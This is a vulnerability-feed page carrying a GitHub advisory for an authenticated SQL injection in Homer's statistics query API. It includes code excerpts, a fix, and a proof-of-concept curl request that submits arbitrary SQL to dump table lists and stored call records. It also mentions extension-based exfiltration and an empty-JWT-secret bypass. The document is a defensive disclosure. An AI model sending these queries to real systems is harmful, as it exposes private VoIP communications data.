OFFLINE
Awaiting data
Security intelligence
MajorCritical vulnerability

CVE-2026-62251: Homer: Authenticated SQL Injection via Unvalidated rawquery Field in /api/v4/statistics/query

GitHub Advisories · officialPublished Oct 7, 2026Risk 37/100

### Summary The `V4StatisticsQuery` handler passes the user-supplied `rawquery` field directly to DuckDB without calling the `sqlvalidator.ValidateRawSQL` function used throughout the rest of the codebase. Any authenticated user can execute arbitrary SQL statements against all data accessible through the FlightSQL service. ### Details **`coordinator/handlers/statistics_v4.go` lines 74-107** — `V4StatisticsQuery`: ```go query := &model.V4StatisticsQuery{} if err = c.Bind(query); err != nil { ... } // No ValidateRawSQL call here — contrast with other handlers: results, err := h.flightService.Query(c.Request().Context(), query.RawQuery) ``` **Contrast with `coordinator/handlers/search.go` line 194** — secure pattern not followed: ```go if err := sqlvalidator.ValidateRawSQL(rawQuery); err != nil { return c.JSON(http.StatusBadRequest, ...) } ``` `query.RawQuery` is whatever the caller submitted; it is passed verbatim to the FlightSQL/DuckDB backend. The handler is registered under the `protected` group (requires JWT), but given that the default JWT secret is empty (see related advisory), this is effectively pre-authentication on a default deployment. ### PoC ```bash # With a valid JWT (or empty JWT secret bypass): curl -s -X POST http://<homer-host>/api/v4/statistics/query \ -H "Authorization: Bearer <jwt>" \ -H "Content-Type: application/json" \ -d '{ "param": { "query": [{"rawquery": "SELECT * FROM information_schema.tables"}] } }' # Returns all table names accessible to the DuckDB FlightSQL service # Exfiltrate all stored call records: # "rawquery": "SELECT * FROM hep LIMIT 1000" # Arbitrary DuckDB SQL is accepted including INSTALL/LOAD for extension-based exfiltration ``` ### Impact SQL Injection / Improper Neutralization of Special Elements (CWE-89). Any authenticated user can execute arbitrary SQL against all data accessible to the FlightSQL/DuckDB backend — including all stored VoIP call records, SIP messages, and metadata. Combined with the authentication bypass when JWT secret is empty, this is exploitable without credentials. ### Fix Apply `sqlvalidator.ValidateRawSQL()` to `query.RawQuery` before passing it to `h.flightService.Query()`, matching the pattern already used in `search.go` and `transactions_v4.go`. If possible, please apply for a CVE number when posting.

Upgrade affected packages to a patched version: github.com/sipcapture/homer-app 0.0.0-20260625085520-a7d027dc684b.

Vendor
Not specified
Product
github.com/sipcapture/homer-app
Exploitation
none known
Evidence
official
CVSS
8.1

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source